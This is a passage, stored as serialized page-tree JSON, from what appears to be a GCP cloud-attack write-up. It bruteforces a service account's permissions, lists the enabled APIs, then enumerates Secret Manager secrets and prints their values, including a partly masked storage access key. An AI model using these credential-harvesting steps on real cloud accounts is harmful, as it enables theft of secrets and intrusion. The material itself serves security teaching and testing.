resourcemanager.projects=get\n",{"type":33,"tag":128,"props":3433,"children":3434},{"class":130,"line":1051},[3435,3439,3443,3447,3451,3455],{"type":33,"tag":128,"props":3436,"children":3437},{"style":135},[3438],{"type":38,"value":520},{"type":33,"tag":128,"props":3440,"children":3441},{"style":523},[3442],{"type":38,"value":526},{"type":33,"tag":128,"props":3444,"children":3445},{"style":140},[3446],{"type":38,"value":3418},{"type":33,"tag":128,"props":3448,"children":3449},{"style":140},[3450],{"type":38,"value":577},{"type":33,"tag":128,"props":3452,"children":3453},{"style":140},[3454],{"type":38,"value":541},{"type":33,"tag":128,"props":3456,"children":3457},{"style":140},[3458],{"type":38,"value":3459}," secretmanager.secrets=get\n",{"type":33,"tag":128,"props":3461,"children":3462},{"class":130,"line":1063},[3463,3467,3471,3475,3479,3483],{"type":33,"tag":128,"props":3464,"children":3465},{"style":135},[3466],{"type":38,"value":520},{"type":33,"tag":128,"props":3468,"children":3469},{"style":523},[3470],{"type":38,"value":526},{"type":33,"tag":128,"props":3472,"children":3473},{"style":140},[3474],{"type":38,"value":3418},{"type":33,"tag":128,"props":3476,"children":3477},{"style":140},[3478],{"type":38,"value":577},{"type":33,"tag":128,"props":3480,"children":3481},{"style":140},[3482],{"type":38,"value":541},{"type":33,"tag":128,"props":3484,"children":3485},{"style":140},[3486],{"type":38,"value":3487}," 
secretmanager.secrets=get-iam-policy\n",{"type":33,"tag":128,"props":3489,"children":3490},{"class":130,"line":1076},[3491,3495,3499,3503,3507,3511],{"type":33,"tag":128,"props":3492,"children":3493},{"style":135},[3494],{"type":38,"value":520},{"type":33,"tag":128,"props":3496,"children":3497},{"style":523},[3498],{"type":38,"value":526},{"type":33,"tag":128,"props":3500,"children":3501},{"style":140},[3502],{"type":38,"value":3418},{"type":33,"tag":128,"props":3504,"children":3505},{"style":140},[3506],{"type":38,"value":577},{"type":33,"tag":128,"props":3508,"children":3509},{"style":140},[3510],{"type":38,"value":541},{"type":33,"tag":128,"props":3512,"children":3513},{"style":140},[3514],{"type":38,"value":3515}," secretmanager.secrets=list\n",{"type":33,"tag":128,"props":3517,"children":3518},{"class":130,"line":1089},[3519,3523,3527,3532,3536,3540],{"type":33,"tag":128,"props":3520,"children":3521},{"style":135},[3522],{"type":38,"value":520},{"type":33,"tag":128,"props":3524,"children":3525},{"style":523},[3526],{"type":38,"value":526},{"type":33,"tag":128,"props":3528,"children":3529},{"style":140},[3530],{"type":38,"value":3531}," 00:38:57",{"type":33,"tag":128,"props":3533,"children":3534},{"style":140},[3535],{"type":38,"value":577},{"type":33,"tag":128,"props":3537,"children":3538},{"style":140},[3539],{"type":38,"value":541},{"type":33,"tag":128,"props":3541,"children":3542},{"style":140},[3543],{"type":38,"value":3544}," 
run.routes=invoke\n",{"type":33,"tag":128,"props":3546,"children":3547},{"class":130,"line":1101},[3548,3552,3556,3560,3564,3568],{"type":33,"tag":128,"props":3549,"children":3550},{"style":135},[3551],{"type":38,"value":520},{"type":33,"tag":128,"props":3553,"children":3554},{"style":523},[3555],{"type":38,"value":526},{"type":33,"tag":128,"props":3557,"children":3558},{"style":140},[3559],{"type":38,"value":3531},{"type":33,"tag":128,"props":3561,"children":3562},{"style":140},[3563],{"type":38,"value":577},{"type":33,"tag":128,"props":3565,"children":3566},{"style":140},[3567],{"type":38,"value":541},{"type":33,"tag":128,"props":3569,"children":3570},{"style":140},[3571],{"type":38,"value":3572}," serviceusage.quotas=get\n",{"type":33,"tag":128,"props":3574,"children":3575},{"class":130,"line":1114},[3576,3580,3584,3588,3592,3596],{"type":33,"tag":128,"props":3577,"children":3578},{"style":135},[3579],{"type":38,"value":520},{"type":33,"tag":128,"props":3581,"children":3582},{"style":523},[3583],{"type":38,"value":526},{"type":33,"tag":128,"props":3585,"children":3586},{"style":140},[3587],{"type":38,"value":3531},{"type":33,"tag":128,"props":3589,"children":3590},{"style":140},[3591],{"type":38,"value":577},{"type":33,"tag":128,"props":3593,"children":3594},{"style":140},[3595],{"type":38,"value":541},{"type":33,"tag":128,"props":3597,"children":3598},{"style":140},[3599],{"type":38,"value":3600}," 
serviceusage.services=get\n",{"type":33,"tag":128,"props":3602,"children":3603},{"class":130,"line":1127},[3604,3608,3612,3616,3620,3624],{"type":33,"tag":128,"props":3605,"children":3606},{"style":135},[3607],{"type":38,"value":520},{"type":33,"tag":128,"props":3609,"children":3610},{"style":523},[3611],{"type":38,"value":526},{"type":33,"tag":128,"props":3613,"children":3614},{"style":140},[3615],{"type":38,"value":3531},{"type":33,"tag":128,"props":3617,"children":3618},{"style":140},[3619],{"type":38,"value":577},{"type":33,"tag":128,"props":3621,"children":3622},{"style":140},[3623],{"type":38,"value":541},{"type":33,"tag":128,"props":3625,"children":3626},{"style":140},[3627],{"type":38,"value":3628}," serviceusage.services=list\n",{"type":33,"tag":47,"props":3630,"children":3631},{},[3632],{"type":38,"value":3633},"When we try to bruteforce the permissions of the new service account, we can see that many permissions are allocated to the compute service, but we can quickly see that it is not activated on the GCP organization.",{"type":33,"tag":114,"props":3635,"children":3636},{"lang":116},[3637],{"type":33,"tag":119,"props":3638,"children":3640},{"className":121,"code":3639,"language":116,"meta":8,"style":8},"$> gcloud compute networks list --project=$GCP_PROJ\nAPI [compute.googleapis.com] not enabled on project [gr-proj-4]. Would you like to enable and retry (this will take a few minutes)? 
(y/N)?\n\n$> gcloud services list\nNAME                                 TITLE\nanalyticshub.googleapis.com          Analytics Hub API\nbigquery.googleapis.com              BigQuery API\nbigqueryconnection.googleapis.com    BigQuery Connection API\nbigquerydatapolicy.googleapis.com    BigQuery Data Policy API\nbigquerymigration.googleapis.com     BigQuery Migration API\nbigqueryreservation.googleapis.com   BigQuery Reservation API\nbigquerystorage.googleapis.com       BigQuery Storage API\ncloudapis.googleapis.com             Google Cloud APIs\ncloudresourcemanager.googleapis.com  Cloud Resource Manager API\ncloudtrace.googleapis.com            Cloud Trace API\ndataform.googleapis.com              Dataform API\ndataplex.googleapis.com              Cloud Dataplex API\ndatastore.googleapis.com             Cloud Datastore API\niam.googleapis.com                   Identity and Access Management (IAM) API\niamcredentials.googleapis.com        IAM Service Account Credentials API\nlogging.googleapis.com               Cloud Logging API\nmonitoring.googleapis.com            Cloud Monitoring API\nsecretmanager.googleapis.com         Secret Manager API\nservicemanagement.googleapis.com     Service Management API\nserviceusage.googleapis.com          Service Usage API\nsql-component.googleapis.com         Cloud SQL\nstorage-api.googleapis.com           Google Cloud Storage JSON API\nstorage-component.googleapis.com     Cloud Storage\nstorage.googleapis.com               Cloud Storage 
API\n",[3641],{"type":33,"tag":105,"props":3642,"children":3643},{"__ignoreMap":8},[3644,3686,3774,3781,3806,3819,3842,3859,3881,3907,3929,3951,3973,3996,4023,4045,4062,4084,4106,4139,4171,4193,4214,4235,4256,4278,4296,4326,4344],{"type":33,"tag":128,"props":3645,"children":3646},{"class":130,"line":131},[3647,3652,3657,3661,3666,3671,3676,3681],{"type":33,"tag":128,"props":3648,"children":3649},{"style":135},[3650],{"type":38,"value":3651},"$",{"type":33,"tag":128,"props":3653,"children":3654},{"style":323},[3655],{"type":38,"value":3656},"> ",{"type":33,"tag":128,"props":3658,"children":3659},{"style":140},[3660],{"type":38,"value":110},{"type":33,"tag":128,"props":3662,"children":3663},{"style":140},[3664],{"type":38,"value":3665}," compute",{"type":33,"tag":128,"props":3667,"children":3668},{"style":140},[3669],{"type":38,"value":3670}," networks",{"type":33,"tag":128,"props":3672,"children":3673},{"style":140},[3674],{"type":38,"value":3675}," list",{"type":33,"tag":128,"props":3677,"children":3678},{"style":151},[3679],{"type":38,"value":3680}," --project=",{"type":33,"tag":128,"props":3682,"children":3683},{"style":140},[3684],{"type":38,"value":3685},"$GCP_PROJ\n",{"type":33,"tag":128,"props":3687,"children":3688},{"class":130,"line":362},[3689,3694,3699,3703,3708,3712,3717,3722,3727,3732,3737,3742,3747,3751,3756,3760,3765,3769],{"type":33,"tag":128,"props":3690,"children":3691},{"style":135},[3692],{"type":38,"value":3693},"API",{"type":33,"tag":128,"props":3695,"children":3696},{"style":323},[3697],{"type":38,"value":3698}," [compute.googleapis.com] not enabled on project 
",{"type":33,"tag":128,"props":3700,"children":3701},{"style":312},[3702],{"type":38,"value":344},{"type":33,"tag":128,"props":3704,"children":3705},{"style":323},[3706],{"type":38,"value":3707},"gr-proj-4",{"type":33,"tag":128,"props":3709,"children":3710},{"style":312},[3711],{"type":38,"value":354},{"type":33,"tag":128,"props":3713,"children":3714},{"style":323},[3715],{"type":38,"value":3716},". Would you like to enable and retry (",{"type":33,"tag":128,"props":3718,"children":3719},{"style":135},[3720],{"type":38,"value":3721},"this",{"type":33,"tag":128,"props":3723,"children":3724},{"style":140},[3725],{"type":38,"value":3726}," will",{"type":33,"tag":128,"props":3728,"children":3729},{"style":140},[3730],{"type":38,"value":3731}," take",{"type":33,"tag":128,"props":3733,"children":3734},{"style":140},[3735],{"type":38,"value":3736}," a",{"type":33,"tag":128,"props":3738,"children":3739},{"style":140},[3740],{"type":38,"value":3741}," few",{"type":33,"tag":128,"props":3743,"children":3744},{"style":140},[3745],{"type":38,"value":3746}," 
minutes",{"type":33,"tag":128,"props":3748,"children":3749},{"style":323},[3750],{"type":38,"value":2966},{"type":33,"tag":128,"props":3752,"children":3753},{"style":300},[3754],{"type":38,"value":3755},"?",{"type":33,"tag":128,"props":3757,"children":3758},{"style":323},[3759],{"type":38,"value":2852},{"type":33,"tag":128,"props":3761,"children":3762},{"style":135},[3763],{"type":38,"value":3764},"y/N",{"type":33,"tag":128,"props":3766,"children":3767},{"style":323},[3768],{"type":38,"value":2966},{"type":33,"tag":128,"props":3770,"children":3771},{"style":300},[3772],{"type":38,"value":3773},"?\n",{"type":33,"tag":128,"props":3775,"children":3776},{"class":130,"line":403},[3777],{"type":33,"tag":128,"props":3778,"children":3779},{"emptyLinePlaceholder":896},[3780],{"type":38,"value":899},{"type":33,"tag":128,"props":3782,"children":3783},{"class":130,"line":739},[3784,3788,3792,3796,3801],{"type":33,"tag":128,"props":3785,"children":3786},{"style":135},[3787],{"type":38,"value":3651},{"type":33,"tag":128,"props":3789,"children":3790},{"style":323},[3791],{"type":38,"value":3656},{"type":33,"tag":128,"props":3793,"children":3794},{"style":140},[3795],{"type":38,"value":110},{"type":33,"tag":128,"props":3797,"children":3798},{"style":140},[3799],{"type":38,"value":3800}," services",{"type":33,"tag":128,"props":3802,"children":3803},{"style":140},[3804],{"type":38,"value":3805}," list\n",{"type":33,"tag":128,"props":3807,"children":3808},{"class":130,"line":765},[3809,3814],{"type":33,"tag":128,"props":3810,"children":3811},{"style":135},[3812],{"type":38,"value":3813},"NAME",{"type":33,"tag":128,"props":3815,"children":3816},{"style":140},[3817],{"type":38,"value":3818},"                                 
TITLE\n",{"type":33,"tag":128,"props":3820,"children":3821},{"class":130,"line":804},[3822,3827,3832,3837],{"type":33,"tag":128,"props":3823,"children":3824},{"style":135},[3825],{"type":38,"value":3826},"analyticshub.googleapis.com",{"type":33,"tag":128,"props":3828,"children":3829},{"style":140},[3830],{"type":38,"value":3831},"          Analytics",{"type":33,"tag":128,"props":3833,"children":3834},{"style":140},[3835],{"type":38,"value":3836}," Hub",{"type":33,"tag":128,"props":3838,"children":3839},{"style":140},[3840],{"type":38,"value":3841}," API\n",{"type":33,"tag":128,"props":3843,"children":3844},{"class":130,"line":839},[3845,3850,3855],{"type":33,"tag":128,"props":3846,"children":3847},{"style":135},[3848],{"type":38,"value":3849},"bigquery.googleapis.com",{"type":33,"tag":128,"props":3851,"children":3852},{"style":140},[3853],{"type":38,"value":3854},"              BigQuery",{"type":33,"tag":128,"props":3856,"children":3857},{"style":140},[3858],{"type":38,"value":3841},{"type":33,"tag":128,"props":3860,"children":3861},{"class":130,"line":848},[3862,3867,3872,3877],{"type":33,"tag":128,"props":3863,"children":3864},{"style":135},[3865],{"type":38,"value":3866},"bigqueryconnection.googleapis.com",{"type":33,"tag":128,"props":3868,"children":3869},{"style":140},[3870],{"type":38,"value":3871},"    BigQuery",{"type":33,"tag":128,"props":3873,"children":3874},{"style":140},[3875],{"type":38,"value":3876}," Connection",{"type":33,"tag":128,"props":3878,"children":3879},{"style":140},[3880],{"type":38,"value":3841},{"type":33,"tag":128,"props":3882,"children":3883},{"class":130,"line":976},[3884,3889,3893,3898,3903],{"type":33,"tag":128,"props":3885,"children":3886},{"style":135},[3887],{"type":38,"value":3888},"bigquerydatapolicy.googleapis.com",{"type":33,"tag":128,"props":3890,"children":3891},{"style":140},[3892],{"type":38,"value":3871},{"type":33,"tag":128,"props":3894,"children":3895},{"style":140},[3896],{"type":38,"value":3897}," 
Data",{"type":33,"tag":128,"props":3899,"children":3900},{"style":140},[3901],{"type":38,"value":3902}," Policy",{"type":33,"tag":128,"props":3904,"children":3905},{"style":140},[3906],{"type":38,"value":3841},{"type":33,"tag":128,"props":3908,"children":3909},{"class":130,"line":988},[3910,3915,3920,3925],{"type":33,"tag":128,"props":3911,"children":3912},{"style":135},[3913],{"type":38,"value":3914},"bigquerymigration.googleapis.com",{"type":33,"tag":128,"props":3916,"children":3917},{"style":140},[3918],{"type":38,"value":3919},"     BigQuery",{"type":33,"tag":128,"props":3921,"children":3922},{"style":140},[3923],{"type":38,"value":3924}," Migration",{"type":33,"tag":128,"props":3926,"children":3927},{"style":140},[3928],{"type":38,"value":3841},{"type":33,"tag":128,"props":3930,"children":3931},{"class":130,"line":1001},[3932,3937,3942,3947],{"type":33,"tag":128,"props":3933,"children":3934},{"style":135},[3935],{"type":38,"value":3936},"bigqueryreservation.googleapis.com",{"type":33,"tag":128,"props":3938,"children":3939},{"style":140},[3940],{"type":38,"value":3941},"   BigQuery",{"type":33,"tag":128,"props":3943,"children":3944},{"style":140},[3945],{"type":38,"value":3946}," Reservation",{"type":33,"tag":128,"props":3948,"children":3949},{"style":140},[3950],{"type":38,"value":3841},{"type":33,"tag":128,"props":3952,"children":3953},{"class":130,"line":1014},[3954,3959,3964,3969],{"type":33,"tag":128,"props":3955,"children":3956},{"style":135},[3957],{"type":38,"value":3958},"bigquerystorage.googleapis.com",{"type":33,"tag":128,"props":3960,"children":3961},{"style":140},[3962],{"type":38,"value":3963},"       BigQuery",{"type":33,"tag":128,"props":3965,"children":3966},{"style":140},[3967],{"type":38,"value":3968}," 
Storage",{"type":33,"tag":128,"props":3970,"children":3971},{"style":140},[3972],{"type":38,"value":3841},{"type":33,"tag":128,"props":3974,"children":3975},{"class":130,"line":1026},[3976,3981,3986,3991],{"type":33,"tag":128,"props":3977,"children":3978},{"style":135},[3979],{"type":38,"value":3980},"cloudapis.googleapis.com",{"type":33,"tag":128,"props":3982,"children":3983},{"style":140},[3984],{"type":38,"value":3985},"             Google",{"type":33,"tag":128,"props":3987,"children":3988},{"style":140},[3989],{"type":38,"value":3990}," Cloud",{"type":33,"tag":128,"props":3992,"children":3993},{"style":140},[3994],{"type":38,"value":3995}," APIs\n",{"type":33,"tag":128,"props":3997,"children":3998},{"class":130,"line":1038},[3999,4004,4009,4014,4019],{"type":33,"tag":128,"props":4000,"children":4001},{"style":135},[4002],{"type":38,"value":4003},"cloudresourcemanager.googleapis.com",{"type":33,"tag":128,"props":4005,"children":4006},{"style":140},[4007],{"type":38,"value":4008},"  Cloud",{"type":33,"tag":128,"props":4010,"children":4011},{"style":140},[4012],{"type":38,"value":4013}," Resource",{"type":33,"tag":128,"props":4015,"children":4016},{"style":140},[4017],{"type":38,"value":4018}," Manager",{"type":33,"tag":128,"props":4020,"children":4021},{"style":140},[4022],{"type":38,"value":3841},{"type":33,"tag":128,"props":4024,"children":4025},{"class":130,"line":1051},[4026,4031,4036,4041],{"type":33,"tag":128,"props":4027,"children":4028},{"style":135},[4029],{"type":38,"value":4030},"cloudtrace.googleapis.com",{"type":33,"tag":128,"props":4032,"children":4033},{"style":140},[4034],{"type":38,"value":4035},"            Cloud",{"type":33,"tag":128,"props":4037,"children":4038},{"style":140},[4039],{"type":38,"value":4040}," 
Trace",{"type":33,"tag":128,"props":4042,"children":4043},{"style":140},[4044],{"type":38,"value":3841},{"type":33,"tag":128,"props":4046,"children":4047},{"class":130,"line":1063},[4048,4053,4058],{"type":33,"tag":128,"props":4049,"children":4050},{"style":135},[4051],{"type":38,"value":4052},"dataform.googleapis.com",{"type":33,"tag":128,"props":4054,"children":4055},{"style":140},[4056],{"type":38,"value":4057},"              Dataform",{"type":33,"tag":128,"props":4059,"children":4060},{"style":140},[4061],{"type":38,"value":3841},{"type":33,"tag":128,"props":4063,"children":4064},{"class":130,"line":1076},[4065,4070,4075,4080],{"type":33,"tag":128,"props":4066,"children":4067},{"style":135},[4068],{"type":38,"value":4069},"dataplex.googleapis.com",{"type":33,"tag":128,"props":4071,"children":4072},{"style":140},[4073],{"type":38,"value":4074},"              Cloud",{"type":33,"tag":128,"props":4076,"children":4077},{"style":140},[4078],{"type":38,"value":4079}," Dataplex",{"type":33,"tag":128,"props":4081,"children":4082},{"style":140},[4083],{"type":38,"value":3841},{"type":33,"tag":128,"props":4085,"children":4086},{"class":130,"line":1089},[4087,4092,4097,4102],{"type":33,"tag":128,"props":4088,"children":4089},{"style":135},[4090],{"type":38,"value":4091},"datastore.googleapis.com",{"type":33,"tag":128,"props":4093,"children":4094},{"style":140},[4095],{"type":38,"value":4096},"             Cloud",{"type":33,"tag":128,"props":4098,"children":4099},{"style":140},[4100],{"type":38,"value":4101}," Datastore",{"type":33,"tag":128,"props":4103,"children":4104},{"style":140},[4105],{"type":38,"value":3841},{"type":33,"tag":128,"props":4107,"children":4108},{"class":130,"line":1101},[4109,4114,4119,4124,4129,4134],{"type":33,"tag":128,"props":4110,"children":4111},{"style":135},[4112],{"type":38,"value":4113},"iam.googleapis.com",{"type":33,"tag":128,"props":4115,"children":4116},{"style":140},[4117],{"type":38,"value":4118},"                   
Identity",{"type":33,"tag":128,"props":4120,"children":4121},{"style":140},[4122],{"type":38,"value":4123}," and",{"type":33,"tag":128,"props":4125,"children":4126},{"style":140},[4127],{"type":38,"value":4128}," Access",{"type":33,"tag":128,"props":4130,"children":4131},{"style":140},[4132],{"type":38,"value":4133}," Management",{"type":33,"tag":128,"props":4135,"children":4136},{"style":323},[4137],{"type":38,"value":4138}," (IAM) API\n",{"type":33,"tag":128,"props":4140,"children":4141},{"class":130,"line":1114},[4142,4147,4152,4157,4162,4167],{"type":33,"tag":128,"props":4143,"children":4144},{"style":135},[4145],{"type":38,"value":4146},"iamcredentials.googleapis.com",{"type":33,"tag":128,"props":4148,"children":4149},{"style":140},[4150],{"type":38,"value":4151},"        IAM",{"type":33,"tag":128,"props":4153,"children":4154},{"style":140},[4155],{"type":38,"value":4156}," Service",{"type":33,"tag":128,"props":4158,"children":4159},{"style":140},[4160],{"type":38,"value":4161}," Account",{"type":33,"tag":128,"props":4163,"children":4164},{"style":140},[4165],{"type":38,"value":4166}," Credentials",{"type":33,"tag":128,"props":4168,"children":4169},{"style":140},[4170],{"type":38,"value":3841},{"type":33,"tag":128,"props":4172,"children":4173},{"class":130,"line":1127},[4174,4179,4184,4189],{"type":33,"tag":128,"props":4175,"children":4176},{"style":135},[4177],{"type":38,"value":4178},"logging.googleapis.com",{"type":33,"tag":128,"props":4180,"children":4181},{"style":140},[4182],{"type":38,"value":4183},"               Cloud",{"type":33,"tag":128,"props":4185,"children":4186},{"style":140},[4187],{"type":38,"value":4188}," 
Logging",{"type":33,"tag":128,"props":4190,"children":4191},{"style":140},[4192],{"type":38,"value":3841},{"type":33,"tag":128,"props":4194,"children":4195},{"class":130,"line":1139},[4196,4201,4205,4210],{"type":33,"tag":128,"props":4197,"children":4198},{"style":135},[4199],{"type":38,"value":4200},"monitoring.googleapis.com",{"type":33,"tag":128,"props":4202,"children":4203},{"style":140},[4204],{"type":38,"value":4035},{"type":33,"tag":128,"props":4206,"children":4207},{"style":140},[4208],{"type":38,"value":4209}," Monitoring",{"type":33,"tag":128,"props":4211,"children":4212},{"style":140},[4213],{"type":38,"value":3841},{"type":33,"tag":128,"props":4215,"children":4216},{"class":130,"line":1152},[4217,4222,4227,4231],{"type":33,"tag":128,"props":4218,"children":4219},{"style":135},[4220],{"type":38,"value":4221},"secretmanager.googleapis.com",{"type":33,"tag":128,"props":4223,"children":4224},{"style":140},[4225],{"type":38,"value":4226},"         Secret",{"type":33,"tag":128,"props":4228,"children":4229},{"style":140},[4230],{"type":38,"value":4018},{"type":33,"tag":128,"props":4232,"children":4233},{"style":140},[4234],{"type":38,"value":3841},{"type":33,"tag":128,"props":4236,"children":4237},{"class":130,"line":1165},[4238,4243,4248,4252],{"type":33,"tag":128,"props":4239,"children":4240},{"style":135},[4241],{"type":38,"value":4242},"servicemanagement.googleapis.com",{"type":33,"tag":128,"props":4244,"children":4245},{"style":140},[4246],{"type":38,"value":4247},"     
Service",{"type":33,"tag":128,"props":4249,"children":4250},{"style":140},[4251],{"type":38,"value":4133},{"type":33,"tag":128,"props":4253,"children":4254},{"style":140},[4255],{"type":38,"value":3841},{"type":33,"tag":128,"props":4257,"children":4258},{"class":130,"line":1177},[4259,4264,4269,4274],{"type":33,"tag":128,"props":4260,"children":4261},{"style":135},[4262],{"type":38,"value":4263},"serviceusage.googleapis.com",{"type":33,"tag":128,"props":4265,"children":4266},{"style":140},[4267],{"type":38,"value":4268},"          Service",{"type":33,"tag":128,"props":4270,"children":4271},{"style":140},[4272],{"type":38,"value":4273}," Usage",{"type":33,"tag":128,"props":4275,"children":4276},{"style":140},[4277],{"type":38,"value":3841},{"type":33,"tag":128,"props":4279,"children":4280},{"class":130,"line":1189},[4281,4286,4291],{"type":33,"tag":128,"props":4282,"children":4283},{"style":135},[4284],{"type":38,"value":4285},"sql-component.googleapis.com",{"type":33,"tag":128,"props":4287,"children":4288},{"style":140},[4289],{"type":38,"value":4290},"         Cloud",{"type":33,"tag":128,"props":4292,"children":4293},{"style":140},[4294],{"type":38,"value":4295}," SQL\n",{"type":33,"tag":128,"props":4297,"children":4298},{"class":130,"line":1202},[4299,4304,4309,4313,4317,4322],{"type":33,"tag":128,"props":4300,"children":4301},{"style":135},[4302],{"type":38,"value":4303},"storage-api.googleapis.com",{"type":33,"tag":128,"props":4305,"children":4306},{"style":140},[4307],{"type":38,"value":4308},"           Google",{"type":33,"tag":128,"props":4310,"children":4311},{"style":140},[4312],{"type":38,"value":3990},{"type":33,"tag":128,"props":4314,"children":4315},{"style":140},[4316],{"type":38,"value":3968},{"type":33,"tag":128,"props":4318,"children":4319},{"style":140},[4320],{"type":38,"value":4321}," 
JSON",{"type":33,"tag":128,"props":4323,"children":4324},{"style":140},[4325],{"type":38,"value":3841},{"type":33,"tag":128,"props":4327,"children":4328},{"class":130,"line":1214},[4329,4334,4339],{"type":33,"tag":128,"props":4330,"children":4331},{"style":135},[4332],{"type":38,"value":4333},"storage-component.googleapis.com",{"type":33,"tag":128,"props":4335,"children":4336},{"style":140},[4337],{"type":38,"value":4338},"     Cloud",{"type":33,"tag":128,"props":4340,"children":4341},{"style":140},[4342],{"type":38,"value":4343}," Storage\n",{"type":33,"tag":128,"props":4345,"children":4346},{"class":130,"line":1226},[4347,4352,4356,4360],{"type":33,"tag":128,"props":4348,"children":4349},{"style":135},[4350],{"type":38,"value":4351},"storage.googleapis.com",{"type":33,"tag":128,"props":4353,"children":4354},{"style":140},[4355],{"type":38,"value":4183},{"type":33,"tag":128,"props":4357,"children":4358},{"style":140},[4359],{"type":38,"value":3968},{"type":33,"tag":128,"props":4361,"children":4362},{"style":140},[4363],{"type":38,"value":3841},{"type":33,"tag":47,"props":4365,"children":4366},{},[4367],{"type":38,"value":4368},"We can also see that we have rights on the secrets that we can enumerate with the following command:",{"type":33,"tag":114,"props":4370,"children":4371},{"lang":116},[4372],{"type":33,"tag":119,"props":4373,"children":4375},{"className":121,"code":4374,"language":116,"meta":8,"style":8},"$> gcloud secrets list --project=$GCP_PROJ\nNAME              CREATED              REPLICATION_POLICY  LOCATIONS\npayments          2025-04-02T14:36:59  automatic           -\npayments-storage  2025-04-02T16:25:57  automatic           -\n\n$> gcloud secrets versions access latest --secret=payments-storage  --project=$GCP_PROJ\ngr-stripe\n\n$> gcloud secrets versions access latest --secret=payments  
--project=$GCP_PROJ\nGOOG1E6CZ32****************************************\nHh**************************************\n",[4376],{"type":33,"tag":105,"props":4377,"children":4378},{"__ignoreMap":8},[4379,4411,4433,4456,4477,4484,4532,4540,4547,4591,4599],{"type":33,"tag":128,"props":4380,"children":4381},{"class":130,"line":131},[4382,4386,4390,4394,4399,4403,4407],{"type":33,"tag":128,"props":4383,"children":4384},{"style":135},[4385],{"type":38,"value":3651},{"type":33,"tag":128,"props":4387,"children":4388},{"style":323},[4389],{"type":38,"value":3656},{"type":33,"tag":128,"props":4391,"children":4392},{"style":140},[4393],{"type":38,"value":110},{"type":33,"tag":128,"props":4395,"children":4396},{"style":140},[4397],{"type":38,"value":4398}," secrets",{"type":33,"tag":128,"props":4400,"children":4401},{"style":140},[4402],{"type":38,"value":3675},{"type":33,"tag":128,"props":4404,"children":4405},{"style":151},[4406],{"type":38,"value":3680},{"type":33,"tag":128,"props":4408,"children":4409},{"style":140},[4410],{"type":38,"value":3685},{"type":33,"tag":128,"props":4412,"children":4413},{"class":130,"line":362},[4414,4418,4423,4428],{"type":33,"tag":128,"props":4415,"children":4416},{"style":135},[4417],{"type":38,"value":3813},{"type":33,"tag":128,"props":4419,"children":4420},{"style":140},[4421],{"type":38,"value":4422},"              CREATED",{"type":33,"tag":128,"props":4424,"children":4425},{"style":140},[4426],{"type":38,"value":4427},"              REPLICATION_POLICY",{"type":33,"tag":128,"props":4429,"children":4430},{"style":140},[4431],{"type":38,"value":4432},"  LOCATIONS\n",{"type":33,"tag":128,"props":4434,"children":4435},{"class":130,"line":403},[4436,4441,4446,4451],{"type":33,"tag":128,"props":4437,"children":4438},{"style":135},[4439],{"type":38,"value":4440},"payments",{"type":33,"tag":128,"props":4442,"children":4443},{"style":140},[4444],{"type":38,"value":4445},"          
2025-04-02T14:36:59",{"type":33,"tag":128,"props":4447,"children":4448},{"style":140},[4449],{"type":38,"value":4450},"  automatic",{"type":33,"tag":128,"props":4452,"children":4453},{"style":140},[4454],{"type":38,"value":4455},"           -\n",{"type":33,"tag":128,"props":4457,"children":4458},{"class":130,"line":739},[4459,4464,4469,4473],{"type":33,"tag":128,"props":4460,"children":4461},{"style":135},[4462],{"type":38,"value":4463},"payments-storage",{"type":33,"tag":128,"props":4465,"children":4466},{"style":140},[4467],{"type":38,"value":4468},"  2025-04-02T16:25:57",{"type":33,"tag":128,"props":4470,"children":4471},{"style":140},[4472],{"type":38,"value":4450},{"type":33,"tag":128,"props":4474,"children":4475},{"style":140},[4476],{"type":38,"value":4455},{"type":33,"tag":128,"props":4478,"children":4479},{"class":130,"line":765},[4480],{"type":33,"tag":128,"props":4481,"children":4482},{"emptyLinePlaceholder":896},[4483],{"type":38,"value":899},{"type":33,"tag":128,"props":4485,"children":4486},{"class":130,"line":804},[4487,4491,4495,4499,4503,4508,4513,4518,4523,4528],{"type":33,"tag":128,"props":4488,"children":4489},{"style":135},[4490],{"type":38,"value":3651},{"type":33,"tag":128,"props":4492,"children":4493},{"style":323},[4494],{"type":38,"value":3656},{"type":33,"tag":128,"props":4496,"children":4497},{"style":140},[4498],{"type":38,"value":110},{"type":33,"tag":128,"props":4500,"children":4501},{"style":140},[4502],{"type":38,"value":4398},{"type":33,"tag":128,"props":4504,"children":4505},{"style":140},[4506],{"type":38,"value":4507}," versions",{"type":33,"tag":128,"props":4509,"children":4510},{"style":140},[4511],{"type":38,"value":4512}," access",{"type":33,"tag":128,"props":4514,"children":4515},{"style":140},[4516],{"type":38,"value":4517}," latest",{"type":33,"tag":128,"props":4519,"children":4520},{"style":151},[4521],{"type":38,"value":4522}," 
--secret=payments-storage",{"type":33,"tag":128,"props":4524,"children":4525},{"style":151},[4526],{"type":38,"value":4527},"  --project=",{"type":33,"tag":128,"props":4529,"children":4530},{"style":140},[4531],{"type":38,"value":3685},{"type":33,"tag":128,"props":4533,"children":4534},{"class":130,"line":839},[4535],{"type":33,"tag":128,"props":4536,"children":4537},{"style":135},[4538],{"type":38,"value":4539},"gr-stripe\n",{"type":33,"tag":128,"props":4541,"children":4542},{"class":130,"line":848},[4543],{"type":33,"tag":128,"props":4544,"children":4545},{"emptyLinePlaceholder":896},[4546],{"type":38,"value":899},{"type":33,"tag":128,"props":4548,"children":4549},{"class":130,"line":976},[4550,4554,4558,4562,4566,4570,4574,4578,4583,4587],{"type":33,"tag":128,"props":4551,"children":4552},{"style":135},[4553],{"type":38,"value":3651},{"type":33,"tag":128,"props":4555,"children":4556},{"style":323},[4557],{"type":38,"value":3656},{"type":33,"tag":128,"props":4559,"children":4560},{"style":140},[4561],{"type":38,"value":110},{"type":33,"tag":128,"props":4563,"children":4564},{"style":140},[4565],{"type":38,"value":4398},{"type":33,"tag":128,"props":4567,"children":4568},{"style":140},[4569],{"type":38,"value":4507},{"type":33,"tag":128,"props":4571,"children":4572},{"style":140},[4573],{"type":38,"value":4512},{"type":33,"tag":128,"props":4575,"children":4576},{"style":140},[4577],{"type":38,"value":4517},{"type":33,"tag":128,"props":4579,"children":4580},{"style":151},[4581],{"type":38,"value":4582}," 
